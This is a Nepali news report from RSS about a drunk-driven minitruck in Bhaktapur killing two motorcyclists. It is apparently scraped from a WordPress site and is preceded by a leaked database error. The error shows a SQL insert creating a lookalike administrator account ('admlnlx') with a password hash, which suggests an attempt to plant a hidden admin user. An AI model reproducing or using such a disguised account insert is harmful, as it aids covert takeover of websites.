WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbWRC1KmI3TmESTLGqarzQHex8NOjg/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:41:30', '', 'admlnlx', 'admlnlx')
भक्तपुर,माघ ७ –
दूधपाटीबाट काठमाडाँै फर्कदै गरेको दुई मोटरसाइकललाई सल्लाघारीबाट दूधपाटी जाँदै गरेको मिनिट्रकले भक्तपुरको सल्लाघारीमा ठक्कर दिँदा मोटरसाइकलमा सवार दुई जनाको मृत्यु भएको छ ।
सल्लाघारी सैनिक महाविद्यालय अगाडि बा २ ख ९७२१ नं को मिनी ट्रकले दुईवटा मोटरसाइकललाई एकैसाथ ठक्कर दिँदा दुई जनाको मृत्यु भएकोे महानगरीय ट्राफिक प्रहरी परिसर भक्तपुरले जानकारी दिएको छ ।
प्रहरीका अनुसार दुर्घटनामा बा ४३ प ४५७६ नम्बरको मोटरसाइकल चालक काठमाडौँ कालीमाटी बस्ने वर्ष ४५ का सरोज बानियाँ र बा १४ प ५२८८ नं का मोटरसाइकल चालक कालीमाटीकै वर्ष ४४ का अनीलकृष्ण ताम्राकारको घटनास्थलमै मृत्युभएको हो ।
मादकपदार्थ सेवन गरी सवारी चलाएका मिनीट्रक चालक भक्तपुर चाँगु बस्ने वर्ष ३१ का सलन नगरकोटीलाई प्रहरीले नियन्त्रणमा लिएको ट्राफिक हबल्दार दीपेन्द्र शााहीले बताउनुभयो । – रासस